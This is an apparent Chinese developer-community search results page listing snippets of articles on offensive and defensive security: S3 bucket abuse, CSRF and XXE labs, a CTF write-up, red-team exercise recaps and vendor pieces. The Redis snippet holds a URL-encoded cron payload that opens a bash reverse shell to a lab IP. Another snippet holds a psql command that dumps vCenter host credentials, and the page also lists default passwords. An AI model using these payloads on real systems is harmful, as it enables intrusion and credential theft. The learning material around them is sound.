首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏云安全社区

    AWS S3 对象存储攻防

    说到对象存储就不得不提 Amazon,Amazon S3 (Simple Storage Service) 简单存储服务,是 Amazon 的公开云存储服务,与之对应的协议被称为 S3 协议,目前 S3 协议已经被视为公认的行业标准协议,因此目前国内主流的对象存储厂商基本上都会支持 S3 协议。 关于对象存储就介绍到这里,下面来看看在对象存储下的一些攻防手法。 0x03 Bucket Object 遍历 在 s3 中如果在 Bucket 策略处,设置了 s3:ListBucket 的策略,就会导致 Bucket Object 遍历 在使用 MinIO 的时候 例如这样的一个页面 查看源代码可以看到引用了 s3 上的资源 查看 Bucket 策略,发现该 s3 的 Bucket 策略是可读可写的 这时我们可以修改 Bucket 的静态文件,使用户输入账号密码的时候

    4.5K40编辑于 2022-03-01
  • 来自专栏红日安全

    Web安全Day3 - CSRF实战攻防

    大家好,我们是红日安全-Web安全攻防小组。 2、验证Referer 3、关键请求使用验证码功能 1.2 CSRF漏洞利用 1.2.1 利用思路 寻找增删改的地方,构造HTML,修改HTML表单中某些参数,使用浏览器打开该HTML,点击提交表单后查看响应结果 1.2.2 CSRF漏洞利用实例之DVWA 1.2.2.1 安装步骤 下载地址:https://codeload.github.com/ethicalhack3r/DVWA/zip/master 漏洞环境 1.2.4.2 利用过程 将当前用户密码更改为hongri,SQL命令 SET passsword=PASSWORD('hongri'); 构造poc http://f1496b741e86dce4b2f79f3e839f977d.vsplate.me u=pmasa-2017-9 [红日安全]Web安全Day4 - SSRF实战攻防 因特殊原因无法在平台发送,请大家转到以下链接进行学习 https://xz.aliyun.com/t/6235 banner.jpg

    1.3K31发布于 2020-02-19
  • 来自专栏我的安全视界观

    多维视角下的实战攻防演习纪实 3

    继上篇《关于对演习的期望》后,将看到从上至下的打破部门常规职责,在面对公司重大网络安保活动时全司攻防资源的大调度。 公司层面统筹布局 01 — 最高领导部署 大型实战攻防演习,就是一次重大的商机,通过提供红队服务、产品试用、威胁情报、主防协防等方式,每年都会带来不少订单。 2.1 公司指挥体系 指挥体系打通老板到一线甚至客户侧,几乎把公司所有攻防相关的资源都投入其中。在安全公司,要是没有直接或间接参与进来,那至少能推测出不是安全序列人员。 指挥体系下设指挥值班中心,届时所有的情报与演习相关信息都汇聚于此,客户侧安全产品的问题、客户侧的攻防情报等达到指挥中心,将会通过相关团队分析研判、联动大后方各团队给出处置建议,最终再转回到前场客户侧或社会面 具备攻防能力的部门和同事,将会加入这场大作战,不过也可以分为搞攻击的和做防守的。(by the way,要想把防守做好,就必须要懂攻击,并且防好的难度要高于攻击。)

    29620编辑于 2023-09-02
  • 来自专栏FreeBuf

    企业攻防能力仍显不足 | 《2022企业攻击面管理》报告解读

    企业现有安全方案缺陷促成攻防差距  如今企业的全面数字化转型、云计算应用的增加、随时随地工作的常态化以及物联网(IoT)的出现导致,企业对于互联网以及云的依赖直线上升,有2/3的受访者表示60%以上的it 在这一背景下,企业对于互联网攻击的防护能力就变得尤为重要。 但是如今的局面却是企业面对互联网攻击的防护能力远低于实际的攻击力度,很多攻击面实际上并不能覆盖防护到,报告中的数据显示存在约有38%的攻防覆盖差距。那么是什么样的原因造就了如今的局面呢? 【图:攻防能力差异体现】 → 各个团队对攻击面管理准备不足 一个企业的攻击面管理会包括基础设施、软件、应用程序和设备,以及扩展的供应链。 【图:新兴安全技能知识掌握占比】 【图:企业对安全人员的需求】   如何缩小企业攻防差距   许多组织认为,拥有正确的工具来监测其网络安全攻击面就足以管理风险。

    58840编辑于 2023-03-30
  • 来自专栏腾讯安全

    腾讯丁珂:从战略视角构筑云数据时代企业全方位攻防能力

    据美国政府DNI(Director of National Intelligence)报告分析,具备发动信息战攻击能力的国家达到近40个。 与攻击主体拓展相对应的是攻击技术的扩张。 借助这一基础架构,腾讯安全能够帮助企业搭建一个从物理环境和基础设施、可信网络、可信硬件、可信操作系统直到租户安全,从合规治理、运维管理到供应链安全等的全方位可信安全底座,全方位提升企业硬件与供应链的安全能力 ,将密码运算、密码技术及密码产品以服务化、组件化的方式输出,实现从数据获取、数据处理及检索、数据分析与服务,数据访问与消费过程中的安全防护,打通合规层、技术层、云产品层、安全服务层、解决方案层等的安全能力 针对这一问题,腾讯安全搭建出了以“三个基础、一个中心、两个门户”为核心能力的安全合规和运营体系。 而腾讯安全也将在沉淀实战经验的基础上,推出安全专家服务,为企业安全规划和管理开放量身定制的顶尖安全专家服务能力和服务,帮助企业建设动情报、攻防到管理、规划的I.D.E.A全方位安全能力

    81830发布于 2019-11-22
  • 来自专栏OneMoreThink的专栏

    攻防靶场(55):代码分析全凭想象 Djinn3

    hydra命令需要使用-u参数,详见《攻防靶场(32):两个爆破技巧 Funbox 7 EasyEnum》。 2. 3. 权限提升 3.1 计划任务/作业:Cron uid是1000的saint用户存在计划任务,每3分钟会执行一次当前www-data用户没有read和write权限的/home/saint/.sync-data 分隔成3部分的配置文件: 第一部分是“日-月-年”格式的时间(最终会使用时间最新的一份),第二部分是字符“cofig”,第三部分是字符“json”。 配置文件的格式是json或dict。 每隔3分钟,可以看到uid是1000的saint用户执行了计划任务。 使用SSH私钥文件登录22/SSH服务,获得saint用户权限。

    70400编辑于 2025-02-04
  • 来自专栏RASP社区

    攻防演练 | 攻防在即,RASP为上

    信息安全的关键因素是人,有人的地方就有江湖,江湖中避免不了攻防博弈,而博弈是攻防双方采用越来越新的技术进行较量的过程。对于国家、企事业单位甚至个人而言,守护安全防线,确保数据不遗失是最终目的。 而且,攻防演练活动自兴起以来,越来越常态化。但是,每年的这个时刻,都是攻防双方激烈博弈、尤为紧张的时刻。 面对0day/Nday、邮件钓鱼、社工、Web攻击等诸多手段,纵然有蜜罐、WAF、IDS/IPS等诸多防护工具,仍然有安全防护能力的缺失,缺少运行时应用程序保护的RASP技术。 自适应威胁免疫平台作为悬镜第三代DevSecOps智适应威胁管理体系中运营环节的持续检测响应平台,通过专利级AI检测引擎、应用漏洞攻击免疫算法、运行时安全切面调度算法及纵深流量学习算法等关键技术,将主动防御能力 “注入”到业务应用中,借助强大的应用上下文情景分析能力,可捕捉并防御各种绕过流量检测的攻击方式,提供兼具业务透视和功能解耦的内生主动安全免疫能力,为业务应用出厂默认安全免疫迎来革新发展。

    99830编辑于 2023-04-19
  • 来自专栏全栈程序员必看

    XXE攻防

    using external entities to retrieve files 1:点开网站,随便选择一个页面 2:开启抓包,点击“Check stock”,并把包发送到重放模块,停止抓包 3: Lab: Exploiting XXE to perform SSRF attacks 1:随意打开一个页面 2:开启抓包,点击“Check stock”,并把包发送到重放模块,停止抓包 3: /flagmeout.php,所以需要设定一下读取文件位置 作者读对flag做了二次处理,上面的flag是一个经过base32编码的 1:base32解码 2:base64解码 3: 参考 [红日安全]Web安全Day8 – XXE实战攻防 浅谈XXE攻击 XXE漏洞利用技巧:从XML到远程代码执行 未知攻焉知防——XXE漏洞攻防 XXE从入门到放弃 浅谈XXE漏洞攻击与防御

    1.5K20编辑于 2022-08-31
  • 来自专栏机器之心

    AI攻防算法能力几何?全新测试基准平台发布,一定要来PK下

    机器之心报道 作者:杜伟 清华大学联合阿里安全、瑞莱智慧 RealAI 等顶尖团队发布首个公平、全面的 AI 对抗攻防基准平台。AI 模型究竟是否安全,攻击和防御能力几何? 在 AI 模型和算法面临种种挑战的情况下,如何准确地探知各个 AI 攻防模型的攻防能力变得愈加重要。 这时,如果出现一个平台能够对 AI 模型和算法的攻防能力做出排名,那么我们就能够及时地调整改进,并有的放矢地采取防范措施,也就可以降低技术落地过程中的安全风险。 、全面地衡量不同 AI 攻防算法的效果,提供方便使用的鲁棒性测试工具,全面衡量 AI 攻防模型的攻防能力。 用户可以通过提交模型的方式获取攻防能力排名。

    51320编辑于 2023-03-29
  • 来自专栏极安御信安全研究院

    XCTF攻防世界--(新手赛区)第3题快来围观学习!

    1.先查看题目要求 2.直接告诉我们是个被加壳的64位二进制文件,那我们先下载下来查壳脱壳 3.upx的壳,由于是二进制文件,那我们就用kali去脱壳吧 [tip]脱壳命令: upx -d 脱壳文件路径

    31810编辑于 2022-05-26
  • 来自专栏Khan安全团队

    Redis攻防

    0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E %26%20%2Fdev%2Ftcp%2F192.168.17.141%2F7777%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20% 192.168.17.138 攻击机(主机):192.168.17.130 https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server python3

    1.3K20发布于 2021-01-11
  • 来自专栏FreeBuf

    攻防经验和能力如何沉淀到日常安全防护?| FreeBuf甲方社群直播回顾

    主持人:我们如何能将攻防演练中的能力沉淀到平台,变成自动化能力,使其更加符合实际需求? 甲方安全人员要学会通过攻防演练借鉴安全专家们的攻防能力,然后完善自己的处置 SOP 以及补齐日志盲区,最终降低有效告警的解决时间。 主持人:攻防演练的能力如何沉淀到日常的安全防护中? ‍‍红方代表张贵卿:我们可以总结攻防期间0day爆发的趋势,结合企业自身架构以及采购设备,做好安全防护,避免历史漏洞再次被利用。 这是一个偏向蓝方的问题,企业可以评估自身攻防能力成熟度,根据短板或关键点进行投入决策。 蓝方代表剑思庭:攻防期间的能力经验还是很宝贵的,通过复盘我们可以清晰地了解到一些攻击面或攻击路线,这些经验可以积累到日常的安全运营中。

    61930编辑于 2023-03-30
  • 来自专栏FreeBuf

    无线攻防:wifi攻防从破解到钓鱼

    RTL-SDR、USRP、HackRF、及BladeRF等外设的价格下降,软件环境社区的完善,使现在对无线网络的研究已经不再像以前只能利用2.4GHz的无线网卡进行狭义的“无线”攻防3. HackRF主要做wei基站!射频范围很宽! ,无线网卡 选择3 ,mk3 这里2.4GHz虚拟环境下,选择mdk3,如果是5GHz选择mdk4~ 选择【1】流氓 AP-hostapd(推荐) 选择[1]hash - cowpatty 选择 3、需要一个没有机密wifi密码的客户端。 -g -c 10 -s 200 3、身份认证攻击 小型wifi的DDOS攻击,导致让人全部不能连接 mdk3 wlan0monmon a -a B4:54:59:5A:DF:F0 拓展: 提出连接此

    9.6K42发布于 2021-08-24
  • 来自专栏红蓝对抗

    攻防|记一次攻防案例总结

    朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把“亿人安全“设为星标”,否则可能就看不到了啦在某头部直辖市的攻防演练中,各家安全厂商投入了大量人力物力...而我方基本未做准备,只有小米加步枪, 且看如何不用0day如何连下数城前言几个月前打了一场某头部直辖市的攻防演练,演练当时通知的很急促,没做什么准备直接小米加步枪上阵了...在此过程中,很多个没用到0day的打点案例都很有意思,下面就简单分享一下案例一 RCE的话,历史上主要有“默认X-API-Key”和“Dashboard未授权访问”两个洞可以用过往挖某SRC的时候,就遇到过默认X-API-Key导致可直接创建执行lua代码的恶意路由的问题恰巧这次攻防演练中 难怪用不了使用该JWT,通过webpack提取到的api,访问后端API,拿下大量敏感信息,达千万量级,防止burp卡死,仅列出部分后言不断提升识别攻击面、利用攻击面的广度与深度,是一名hacker的核心素养攻防之中 ,拥有充足的经验,而又不陷入经验主义的迂腐,面对万难,而又不放弃思考,是出奇制胜的关键所在原文经过过文作者授权转载原文作者:奇安信攻防社区(J0o1ey)原文地址:https://forum.butian.net

    1.2K20编辑于 2023-12-25
  • 来自专栏红蓝对抗

    攻防|记一次市级攻防演练

    时间 时间在22年护网结束之后,8月中旬左右,当时公司接了一个市级的攻防演练,作为实习生的我,有幸和师傅一起参加,也是我第一次以红队身份参加,当然,更多的还是蹭师傅的光 拿了第一有个感谢信(O(∩_∩ 端口开放: 成果五:某公司MongoDB未授权漏洞(空口令) 这个比较容易,fofa搜了下发现27017端口,遂尝试 成果六:某公司OA注入+任意文件上传 首先是某OA的注入获取shell 攻防开始前已经被上传马了 结尾 我也是第一次参加,虽然每边分到90多个url,但是一半多都是门户网站,一开始说内网可以打,过了一天又不让打了,当时因为cs的版本上线还有点问题纠结好久,然后星期五开始写报告就结束了这次攻防演练

    1K61编辑于 2023-02-28
  • 来自专栏红蓝对抗

    攻防』记一次EDU攻防演练

    文章首发于:奇安信攻防社区 https://forum.butian.net/share/1633 背景 记一次EDU攻防,来之前还是有点怂的,因为前段时间刚打了其它地方EDU感受了一波,小部分目标有重合好难打啊 挑了几个目标fscan快速识别一波资产没啥东西呀,web页面有个内网地址泄露记一下,可以确定这个ip是在服务器段的,我还没进去内网呢要这破ip干嘛 上超级弱口令检测工具扫一波弱口令,telnet口令爆破到一个h3c 第二天找c师傅看了一下也搞不上敲了这下咋办啊,设备有telnet、ping功能,看了下设备上路由表确定了有2、3、5、6网段,telnet测试了一波网段一头一尾的IP,根据端口开放情况确定了2网段都是些服务器 、3网段没法确定、5网段应该也是部分服务器段还有些无线ap设备。 总结 这次攻防整体的反思,外网打点信息收集尽量宽泛仔细一些,在现场打压力还是大的打不出来东西就是在坐牢,和队伍里师傅第一次协作不是很好没有沟通好打哪个目标好点,师傅第一次打也很懵逼,我打的多之前都是旁边辅助混子哈哈哈

    1.4K40编辑于 2022-08-05
  • 来自专栏历史专栏

    【愚公系列】2023年05月 攻防世界-MOBILE(app3

    3.相关工具 下面介绍两个反编译工具 jadx是一个用于反编译Android APK文件的开源工具,静态反编译,查找索引功能强大 jeb和IDA很像,属于动态调试,可以看java汇编也可以生成伪代码,还可以动态 安装命令 pip3 install objection frida是一款便携的、自由的、支持全平台的hook框架,可以通过编写JavaScript、Python代码来和frida_server端进行交互 frida的安装可以参考:https://www.jianshu.com/p/60cfd3f6afde 一、app3 1.题目 2.答题 2.1 Android backup extractor 下载地址 ab app3.tar 接下来解压app3.tar,一番搜寻后,发现了base.apk,也就是我们需要分析的程序 2.21 jadx反编译apk文件 package com.example.yaphetshan.tencentwelcome _Do_Y0u_Lov3_Tenc3nt!}

    67830编辑于 2023-05-24
  • 来自专栏历史专栏

    【愚公系列】2023年04月 攻防世界-MOBILE(boomshakalaka-3

    安装命令 pip3 install objection frida是一款便携的、自由的、支持全平台的hook框架,可以通过编写JavaScript、Python代码来和frida_server端进行交互 frida的安装可以参考:https://www.jianshu.com/p/60cfd3f6afde 一、boomshakalaka-3 1.题目 2.答题 1、源码分析 jadx打开文件 _fastcall ControlLayer::updateScore(cocos2d::CCUserDefault *result, const char *a2) { int v2; // r3 = 4 ); if ( (unsigned int)a2 <= 0x3B9ACA00 ) { v4 = cocos2d::CCUserDefault::sharedUserDefault (result); sub_3A34D8(v21, &unk_3F92A0, v19); cocos2d::CCUserDefault::getStringForKey(v20, v4,

    1K20编辑于 2023-04-28
  • 来自专栏漫流砂

    记一次攻防演练tips | 攻防tips

    现在我依稀记得大家在9月25日晚集体过年的场景,没想到的是:那tm只是开始 这一段时间一直在打攻防,重复、单调、无长进,希望早日脱离苦海吧 下面以攻防过程中的一段经历来展现一些有意思的tips ---- 删除自解压程序 del /f /a /q %b% rem 删除马 del /f /a /q %0% rem 删除bat自身 0x05 内网渗透 我对于攻防比赛中的内网渗透是及其反感的

    1.3K61发布于 2020-12-17
  • 来自专栏红蓝对抗

    攻防|记一次攻防演练实战总结

    文章首发于:奇安信攻防社区 https://forum.butian.net/share/1780 对前阵子的攻防演练比赛进行总结,分享一些个人的思路和方法 0x01 外网打点 资产发现 多测绘平台搜索 #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password 在这次攻防演练里 123 test root 对于一些应用广泛的系统,可以通过google语法搜索其默认密码 这里通过sysadmin/1 成功登入泛微后台 nacos/nacos 常见漏洞利用 对于多目标的攻防演练 VCDB -c "select ip\_address,user\_name,password from vpx\_host;" > password.enc #改成这种格式\* H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF /iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==\* zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6

    2.1K30编辑于 2022-12-22
领券